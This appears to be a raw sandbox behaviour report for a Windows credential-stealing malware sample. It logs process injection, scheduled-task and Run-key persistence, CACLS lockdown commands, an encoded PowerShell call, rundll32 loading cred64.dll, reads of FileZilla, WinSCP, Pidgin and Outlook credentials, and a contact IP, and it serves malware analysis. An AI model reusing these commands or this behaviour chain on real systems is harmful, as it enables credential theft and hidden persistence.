protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0488a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0488b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0488c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0
description gntuud.exe tried to sleep 161 seconds, actually delayed analysis time by 161 seconds
file C:\Users\test22\AppData\Roaming\96facdca63b65f\cred64.dll
file C:\Users\test22\AppData\Local\Temp\1000025001\TeamViewerSetupx64.exe
file C:\Users\test22\AppData\Local\Temp\1000043001\LanguageTool.exe
file C:\Users\test22\AppData\Roaming\1000028000\explorer.exe
file C:\Users\test22\AppData\Roaming\1000030000\TeamViewer_Desktop.exe
Time & API Arguments Status Return Repeated

CreateServiceA

service_start_name:
start_type: 2
password:
display_name: Ghijkl Nopqrstu Wxyabcde Ghij
filepath: C:\Windows\rerzsi.exe
service_name: Ghijkl Nopqrstu Wxy
filepath_r: C:\Windows\rerzsi.exe
desired_access: 983551
service_handle: 0x005444f8
error_control: 1
service_type: 272
service_manager_handle: 0x00544598
1 5522680 0
file C:\Users\test22\AppData\Local\Temp\4ca685c424\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
cmdline "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "gntuud.exe" /P "test22:N"&&CACLS "gntuud.exe" /P "test22:R" /E&&echo Y|CACLS "..\4ca685c424" /P "test22:N"&&CACLS "..\4ca685c424" /P "test22:R" /E&&Exit
cmdline C:\Windows\system32\cmd.exe /S /D /c" echo Y"
cmdline powershell -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAANgAwAA==
cmdline C:\Windows\System32\cmd.exe /c del C:\Users\test22\AppData\Roaming\100002~1\explorer.exe > nul
cmdline "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN gntuud.exe /TR "C:\Users\test22\AppData\Local\Temp\4ca685c424\gntuud.exe" /F
cmdline "C:\Windows\system32\cmd.exe" /c del C:\Users\test22\AppData\Roaming\100002~1\explorer.exe > nul
cmdline "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAANgAwAA==
cmdline SCHTASKS /Create /SC MINUTE /MO 1 /TN gntuud.exe /TR "C:\Users\test22\AppData\Local\Temp\4ca685c424\gntuud.exe" /F
file C:\Users\test22\AppData\Local\Temp\1000025001\TeamViewerSetupx64.exe
file C:\Users\test22\AppData\Roaming\1000028000\explorer.exe
file C:\Users\test22\AppData\Roaming\1000030000\TeamViewer_Desktop.exe
file C:\Users\test22\AppData\Local\Temp\1000043001\LanguageTool.exe
file C:\Users\test22\AppData\Roaming\1000030000\TeamViewer_Desktop.exe
file C:\Users\test22\AppData\Roaming\1000028000\explorer.exe
file C:\Users\test22\AppData\Local\Temp\1000043001\LanguageTool.exe
file C:\Users\test22\AppData\Roaming\96facdca63b65f\cred64.dll
Time & API Arguments Status Return Repeated

ShellExecuteExW

show_type: 0
filepath_r: C:\Users\test22\AppData\Local\Temp\4ca685c424\gntuud.exe
parameters:
filepath: C:\Users\test22\AppData\Local\Temp\4ca685c424\gntuud.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: SCHTASKS
parameters: /Create /SC MINUTE /MO 1 /TN gntuud.exe /TR "C:\Users\test22\AppData\Local\Temp\4ca685c424\gntuud.exe" /F
filepath: SCHTASKS
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: cmd
parameters: /k echo Y|CACLS "gntuud.exe" /P "test22:N"&&CACLS "gntuud.exe" /P "test22:R" /E&&echo Y|CACLS "..\4ca685c424" /P "test22:N"&&CACLS "..\4ca685c424" /P "test22:R" /E&&Exit
filepath: cmd
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: C:\Users\test22\AppData\Local\Temp\1000025001\TeamViewerSetupx64.exe
parameters:
filepath: C:\Users\test22\AppData\Local\Temp\1000025001\TeamViewerSetupx64.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: C:\Users\test22\AppData\Roaming\1000028000\explorer.exe
parameters:
filepath: C:\Users\test22\AppData\Roaming\1000028000\explorer.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: C:\Users\test22\AppData\Roaming\1000030000\TeamViewer_Desktop.exe
parameters:
filepath: C:\Users\test22\AppData\Roaming\1000030000\TeamViewer_Desktop.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: C:\Users\test22\AppData\Local\Temp\1000043001\LanguageTool.exe
parameters:
filepath: C:\Users\test22\AppData\Local\Temp\1000043001\LanguageTool.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: rundll32.exe
parameters: C:\Users\test22\AppData\Roaming\96facdca63b65f\cred64.dll, Main
filepath: rundll32.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: rundll32.exe
parameters: C:\Users\test22\AppData\Roaming\96facdca63b65f\cred64.dll, Main
filepath: rundll32.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: rundll32.exe
parameters: C:\Users\test22\AppData\Roaming\96facdca63b65f\cred64.dll, Main
filepath: rundll32.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: C:\Windows\system32\cmd.exe
parameters: /c del C:\Users\test22\AppData\Roaming\100002~1\explorer.exe > nul
filepath: C:\Windows\System32\cmd.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: powershell
parameters: -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAANgAwAA==
filepath: powershell
1 1 0
Time & API Arguments Status Return Repeated

InternetReadFile

buffer: MZ ... This program cannot be run in DOS mode. [PE image; binary dump omitted]
request_handle: 0x00cc000c
1 1 0

InternetReadFile

buffer: MZ ... This program cannot be run in DOS mode. [PE image; binary dump omitted]
request_handle: 0x00cc000c
1 1 0

InternetReadFile

buffer: MZ ... This program cannot be run in DOS mode. [PE image; binary dump omitted]
request_handle: 0x00cc000c
1 1 0

InternetReadFile

buffer: MZ ... This program cannot be run in DOS mode. [PE image; binary dump omitted]
request_handle: 0x00cc000c
1 1 0

InternetReadFile

buffer: MZP ... This program must be run under Win32 [PE image; binary dump omitted]
request_handle: 0x00cc000c
1 1 0
section .data (virtual_address 0x00044000, virtual_size 0x0003c810, size_of_data 0x0003ca00, entropy 7.992757119699273) entropy 7.9927571197 description A section with a high entropy has been found
entropy 0.840554592721 description Overall entropy of this PE file is high
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule DebuggerException__SetConsoleCtrl
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description Checks if being debugged rule anti_dbg
description Bypass DEP rule disable_dep
description Communications over RAW Socket rule Network_TCP_Socket
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description Checks if being debugged rule anti_dbg
description Bypass DEP rule disable_dep
cmdline C:\Windows\System32\cmd.exe /c del C:\Users\test22\AppData\Roaming\100002~1\explorer.exe > nul
cmdline "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN gntuud.exe /TR "C:\Users\test22\AppData\Local\Temp\4ca685c424\gntuud.exe" /F
cmdline "C:\Windows\system32\cmd.exe" /c del C:\Users\test22\AppData\Roaming\100002~1\explorer.exe > nul
cmdline SCHTASKS /Create /SC MINUTE /MO 1 /TN gntuud.exe /TR "C:\Users\test22\AppData\Local\Temp\4ca685c424\gntuud.exe" /F
host 45.89.255.250
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

process_identifier: 2768
region_size: 278528
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x00000170
1 0 0
file C:\ProgramData\AVAST Software
file C:\ProgramData\Avira
file C:\ProgramData\Kaspersky Lab
file C:\ProgramData\Panda Security
file C:\ProgramData\Bitdefender
file C:\ProgramData\AVG
file C:\ProgramData\Doctor Web
reg_key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\TeamViewerSetupx64.exe reg_value C:\Users\test22\AppData\Local\Temp\1000025001\TeamViewerSetupx64.exe
reg_key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\explorer.exe reg_value C:\Users\test22\AppData\Roaming\1000028000\explorer.exe
reg_key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\TeamViewer_Desktop.exe reg_value C:\Users\test22\AppData\Roaming\1000030000\TeamViewer_Desktop.exe
reg_key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\LanguageTool.exe reg_value C:\Users\test22\AppData\Local\Temp\1000043001\LanguageTool.exe
service_name Ghijkl Nopqrstu Wxy service_path C:\Windows\rerzsi.exe
reg_key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\LanguageTool reg_value "C:\Users\test22\AppData\Roaming\Microsoft\Vault\LanguageTool.exe"
cmdline "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN gntuud.exe /TR "C:\Users\test22\AppData\Local\Temp\4ca685c424\gntuud.exe" /F
cmdline SCHTASKS /Create /SC MINUTE /MO 1 /TN gntuud.exe /TR "C:\Users\test22\AppData\Local\Temp\4ca685c424\gntuud.exe" /F
Time & API Arguments Status Return Repeated

RegSetValueExA

key_handle: 0x0000000000000074
regkey_r:
reg_type: 3 (REG_BINARY)
value: MZ ... This program cannot be run in DOS mode. [PE image; binary dump omitted]
regkey: HKEY_CURRENT_USER\Software\TeamViewerSetupx64\(Default)
1 0 0
file C:\Users\test22\AppData\Roaming\FileZilla\sitemanager.xml
registry HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Sessions
file C:\Users\test22\AppData\Roaming\.purple\accounts.xml
Time & API Arguments Status Return Repeated

WriteProcessMemory

buffer: MZ ... This program cannot be run in DOS mode. [PE image; binary dump omitted]
base_address: 0x00400000
process_identifier: 2768
process_handle: 0x00000170
1 1 0

WriteProcessMemory

buffer: [PE data section; binary dump omitted]
base_address: 0x0043c000
process_identifier: 2768
process_handle: 0x00000170
1 1 0

WriteProcessMemory

buffer: €0€ H`ð}<?xml version='1.0' encoding='UTF-8' standalone='yes'?> <assembly xmlns='urn:schemas-microsoft-com:asm.v1' manifestVersion='1.0'> <trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"> <security> <requestedPrivileges> <requestedExecutionLevel level='asInvoker' uiAccess='false' /> </requestedPrivileges> </security> </trustInfo> </assembly>
base_address: 0x0043f000
process_identifier: 2768
process_handle: 0x00000170
1 1 0

WriteProcessMemory

buffer: @
base_address: 0x7efde008
process_identifier: 2768
process_handle: 0x00000170
1 1 0
Time & API Arguments Status Return Repeated

WriteProcessMemory

buffer: MZ ... This program cannot be run in DOS mode. [PE image; binary dump omitted]
base_address: 0x00400000
process_identifier: 2768
process_handle: 0x00000170
1 1 0
registry HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003
Process injection Process 2648 called NtSetContextThread to modify thread in remote process 2768
Time & API Arguments Status Return Repeated

NtSetContextThread

registers.eip: 0
registers.esp: 0
registers.edi: 0
registers.eax: 4334931
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
thread_handle: 0x0000038c
process_identifier: 2768
1 0 0
Time & API Arguments Status Return Repeated

RegSetValueExA

key_handle: 0x0000000000000074
regkey_r:
reg_type: 3 (REG_BINARY)
value: MZ ... This program cannot be run in DOS mode. [PE image; binary dump omitted]
regkey: HKEY_CURRENT_USER\Software\TeamViewerSetupx64\(Default)
1 0 0
Process injection Process 2140 resumed a thread in remote process 2248
Process injection Process 2648 resumed a thread in remote process 2768
Time & API Arguments Status Return Repeated

NtResumeThread

thread_handle: 0x00000224
suspend_count: 1
process_identifier: 2248
1 0 0

NtResumeThread

thread_handle: 0x0000038c
suspend_count: 1
process_identifier: 2768
1 0 0
Time & API Arguments Status Return Repeated

CreateProcessInternalW

thread_identifier: 2160
thread_handle: 0x000003bc
process_identifier: 2140
current_directory: C:\Users\test22\AppData\Local\Temp\4ca685c424
filepath: C:\Users\test22\AppData\Roaming\1000028000\explorer.exe
track: 1
command_line: "C:\Users\test22\AppData\Roaming\1000028000\explorer.exe"
filepath_r: C:\Users\test22\AppData\Roaming\1000028000\explorer.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x00000438
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: C:\Users\test22\AppData\Roaming\1000028000\explorer.exe
parameters:
filepath: C:\Users\test22\AppData\Roaming\1000028000\explorer.exe
1 1 0
cmdline "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "gntuud.exe" /P "test22:N"&&CACLS "gntuud.exe" /P "test22:R" /E&&echo Y|CACLS "..\4ca685c424" /P "test22:N"&&CACLS "..\4ca685c424" /P "test22:R" /E&&Exit
cmdline CACLS "..\4ca685c424" /P "test22:N"
cmdline cmd /k echo Y|CACLS "gntuud.exe" /P "test22:N"&&CACLS "gntuud.exe" /P "test22:R" /E&&echo Y|CACLS "..\4ca685c424" /P "test22:N"&&CACLS "..\4ca685c424" /P "test22:R" /E&&Exit
cmdline CACLS "gntuud.exe" /P "test22:R" /E
cmdline CACLS "gntuud.exe" /P "test22:N"
cmdline CACLS "..\4ca685c424" /P "test22:R" /E
regkey HKEY_CURRENT_USER\Software\TeamViewerSetupx64
Time & API Arguments Status Return Repeated

CreateProcessInternalW

thread_identifier: 2292
thread_handle: 0x0000027c
process_identifier: 2288
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Users\test22\AppData\Local\Temp\4ca685c424\gntuud.exe
track: 1
command_line: "C:\Users\test22\AppData\Local\Temp\4ca685c424\gntuud.exe"
filepath_r: C:\Users\test22\AppData\Local\Temp\4ca685c424\gntuud.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x00000284
1 1 0

NtResumeThread

thread_handle: 0x00000238
suspend_count: 1
process_identifier: 2288
1 0 0

CreateProcessInternalW

thread_identifier: 2616
thread_handle: 0x0000025c
process_identifier: 2612
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Windows\System32\schtasks.exe
track: 1
command_line: "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN gntuud.exe /TR "C:\Users\test22\AppData\Local\Temp\4ca685c424\gntuud.exe" /F
filepath_r: C:\Windows\System32\schtasks.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x00000264
1 1 0

CreateProcessInternalW

thread_identifier: 2676
thread_handle: 0x000001e4
process_identifier: 2672
current_directory: C:\Users\test22\AppData\Local\Temp\4ca685c424
filepath: C:\Windows\System32\cmd.exe
track: 1
command_line: "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "gntuud.exe" /P "test22:N"&&CACLS "gntuud.exe" /P "test22:R" /E&&echo Y|CACLS "..\4ca685c424" /P "test22:N"&&CACLS "..\4ca685c424" /P "test22:R" /E&&Exit
filepath_r: C:\Windows\System32\cmd.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x00000250
1 1 0

CreateProcessInternalW

thread_identifier: 3068
thread_handle: 0x0000044c
process_identifier: 3064
current_directory: C:\Users\test22\AppData\Local\Temp\4ca685c424
filepath: C:\Users\test22\AppData\Local\Temp\1000025001\TeamViewerSetupx64.exe
track: 1
command_line: "C:\Users\test22\AppData\Local\Temp\1000025001\TeamViewerSetupx64.exe"
filepath_r: C:\Users\test22\AppData\Local\Temp\1000025001\TeamViewerSetupx64.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x00000438
1 1 0

CreateProcessInternalW

thread_identifier: 2160
thread_handle: 0x000003bc
process_identifier: 2140
current_directory: C:\Users\test22\AppData\Local\Temp\4ca685c424
filepath: C:\Users\test22\AppData\Roaming\1000028000\explorer.exe
track: 1
command_line: "C:\Users\test22\AppData\Roaming\1000028000\explorer.exe"
filepath_r: C:\Users\test22\AppData\Roaming\1000028000\explorer.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x00000438
1 1 0

CreateProcessInternalW

thread_identifier: 2180
thread_handle: 0x00000440
process_identifier: 2184
current_directory: C:\Users\test22\AppData\Local\Temp\4ca685c424
filepath: C:\Users\test22\AppData\Roaming\1000030000\TeamViewer_Desktop.exe
track: 1
command_line: "C:\Users\test22\AppData\Roaming\1000030000\TeamViewer_Desktop.exe"
filepath_r: C:\Users\test22\AppData\Roaming\1000030000\TeamViewer_Desktop.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x0000044c
1 1 0

CreateProcessInternalW

thread_identifier: 2812
thread_handle: 0x000003b8
process_identifier: 2648
current_directory: C:\Users\test22\AppData\Local\Temp\4ca685c424
filepath: C:\Users\test22\AppData\Local\Temp\1000043001\LanguageTool.exe
track: 1
command_line: "C:\Users\test22\AppData\Local\Temp\1000043001\LanguageTool.exe"
filepath_r: C:\Users\test22\AppData\Local\Temp\1000043001\LanguageTool.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x00000450
1 1 0

CreateProcessInternalW

thread_identifier: 1520
thread_handle: 0x00000464
process_identifier: 2964
current_directory: C:\Users\test22\AppData\Local\Temp\4ca685c424
filepath: C:\Windows\System32\rundll32.exe
track: 1
command_line: "C:\Windows\System32\rundll32.exe" C:\Users\test22\AppData\Roaming\96facdca63b65f\cred64.dll, Main
filepath_r: C:\Windows\System32\rundll32.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x0000047c
1 1 0

CreateProcessInternalW

thread_identifier: 2772
thread_handle: 0x00000470
process_identifier: 2756
current_directory: C:\Users\test22\AppData\Local\Temp\4ca685c424
filepath: C:\Windows\System32\rundll32.exe
track: 1
command_line: "C:\Windows\System32\rundll32.exe" C:\Users\test22\AppData\Roaming\96facdca63b65f\cred64.dll, Main
filepath_r: C:\Windows\System32\rundll32.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x00000480
1 1 0

CreateProcessInternalW

thread_identifier: 2128
thread_handle: 0x00000474
process_identifier: 2028
current_directory: C:\Users\test22\AppData\Local\Temp\4ca685c424
filepath: C:\Windows\System32\rundll32.exe
track: 1
command_line: "C:\Windows\System32\rundll32.exe" C:\Users\test22\AppData\Roaming\96facdca63b65f\cred64.dll, Main
filepath_r: C:\Windows\System32\rundll32.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x00000478
1 1 0

CreateProcessInternalW

thread_identifier: 2744
thread_handle: 0x0000008c
process_identifier: 2740
current_directory: C:\Users\test22\AppData\Local\Temp\4ca685c424
filepath: C:\Windows\System32\cmd.exe
track: 1
command_line: C:\Windows\system32\cmd.exe /S /D /c" echo Y"
filepath_r: C:\Windows\system32\cmd.exe
stack_pivoted: 0
creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 1
process_handle: 0x00000094
1 1 0

CreateProcessInternalW

thread_identifier: 2784
thread_handle: 0x00000088
process_identifier: 2780
current_directory: C:\Users\test22\AppData\Local\Temp\4ca685c424
filepath: C:\Windows\System32\cacls.exe
track: 1
command_line: CACLS "gntuud.exe" /P "test22:N"
filepath_r: C:\Windows\system32\cacls.exe
stack_pivoted: 0
creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 1
process_handle: 0x0000008c
1 1 0

CreateProcessInternalW

thread_identifier: 2836
thread_handle: 0x0000008c
process_identifier: 2832
current_directory: C:\Users\test22\AppData\Local\Temp\4ca685c424
filepath: C:\Windows\System32\cacls.exe
track: 1
command_line: CACLS "gntuud.exe" /P "test22:R" /E
filepath_r: C:\Windows\system32\cacls.exe
stack_pivoted: 0
creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 1
process_handle: 0x00000094
1 1 0

CreateProcessInternalW

thread_identifier: 2884
thread_handle: 0x0000008c
process_identifier: 2880
current_directory: C:\Users\test22\AppData\Local\Temp\4ca685c424
filepath: C:\Windows\System32\cmd.exe
track: 1
command_line: C:\Windows\system32\cmd.exe /S /D /c" echo Y"
filepath_r: C:\Windows\system32\cmd.exe
stack_pivoted: 0
creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 1
process_handle: 0x00000090
1 1 0

CreateProcessInternalW

thread_identifier: 2920
thread_handle: 0x00000094
process_identifier: 2916
current_directory: C:\Users\test22\AppData\Local\Temp\4ca685c424
filepath: C:\Windows\System32\cacls.exe
track: 1
command_line: CACLS "..\4ca685c424" /P "test22:N"
filepath_r: C:\Windows\system32\cacls.exe
stack_pivoted: 0
creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 1
process_handle: 0x0000008c
1 1 0

CreateProcessInternalW

thread_identifier: 2976
thread_handle: 0x0000008c
process_identifier: 2972
current_directory: C:\Users\test22\AppData\Local\Temp\4ca685c424
filepath: C:\Windows\System32\cacls.exe
track: 1
command_line: CACLS "..\4ca685c424" /P "test22:R" /E
filepath_r: C:\Windows\system32\cacls.exe
stack_pivoted: 0
creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 1
process_handle: 0x00000090
1 1 0

NtResumeThread

thread_handle: 0x000000a0
suspend_count: 1
process_identifier: 2780
1 0 0

NtResumeThread

thread_handle: 0x0000009c
suspend_count: 1
process_identifier: 2832
1 0 0

NtResumeThread

thread_handle: 0x000000a0
suspend_count: 1
process_identifier: 2916
1 0 0

NtResumeThread

thread_handle: 0x00000098
suspend_count: 1
process_identifier: 2972
1 0 0

NtResumeThread

thread_handle: 0x000000ec
suspend_count: 1
process_identifier: 2140
1 0 0

CreateProcessInternalW

thread_identifier: 2268
thread_handle: 0x00000224
process_identifier: 2248
current_directory: C:\Users\test22\AppData\Local\Temp\4ca685c424
filepath: C:\Windows\System32\cmd.exe
track: 1
command_line: "C:\Windows\system32\cmd.exe" /c del C:\Users\test22\AppData\Roaming\100002~1\explorer.exe > nul
filepath_r: C:\Windows\system32\cmd.exe
stack_pivoted: 0
creation_flags: 67634196 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_SUSPENDED|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x00000228
1 1 0

NtResumeThread

thread_handle: 0x00000224
suspend_count: 1
process_identifier: 2248
1 0 0

NtResumeThread

thread_handle: 0x000000dc
suspend_count: 1
process_identifier: 2648
1 0 0

NtResumeThread

thread_handle: 0x00000150
suspend_count: 1
process_identifier: 2648
1 0 0

NtResumeThread

thread_handle: 0x0000018c
suspend_count: 1
process_identifier: 2648
1 0 0

NtResumeThread

thread_handle: 0x0000023c
suspend_count: 1
process_identifier: 2648
1 0 0

CreateProcessInternalW

thread_identifier: 2908
thread_handle: 0x000003a4
process_identifier: 2912
current_directory: C:\Users\test22\AppData\Local\Temp\4ca685c424
filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
track: 1
command_line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAANgAwAA==
filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x000003b4
1 1 0

CreateProcessInternalW

thread_identifier: 2728
thread_handle: 0x0000038c
process_identifier: 2768
current_directory:
filepath:
track: 1
command_line: C:\Users\test22\AppData\Local\Temp\1000043001\LanguageTool.exe
filepath_r:
stack_pivoted: 0
creation_flags: 134217732 (CREATE_NO_WINDOW|CREATE_SUSPENDED)
inherit_handles: 0
process_handle: 0x00000170
1 1 0

NtGetContextThread

thread_handle: 0x0000038c
1 0 0

NtAllocateVirtualMemory

process_identifier: 2768
region_size: 278528
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x00000170
1 0 0

WriteProcessMemory

buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $SG*Þ&D&D&D\^GŒ&D\^AŒ‚&D\^@Œ&DES@Œ&DESGŒ&DESAŒ &D\^EŒ&D&E„&DÕSAŒ&DÕS»&DÕSFŒ&DRich&DPEL#q–cà öS% @@@ܪ<ðà¸2¼‚Àƒ؂@ x.text@ `.rdataR“ ”@@.dataÌ*À œ@À.rsrcàð¨@@.reloc¸24ª@B
base_address: 0x00400000
process_identifier: 2768
process_handle: 0x00000170
1 1 0

WriteProcessMemory

buffer:
base_address: 0x00401000
process_identifier: 2768
process_handle: 0x00000170
1 1 0

WriteProcessMemory

buffer:
base_address: 0x00432000
process_identifier: 2768
process_handle: 0x00000170
1 1 0

WriteProcessMemory

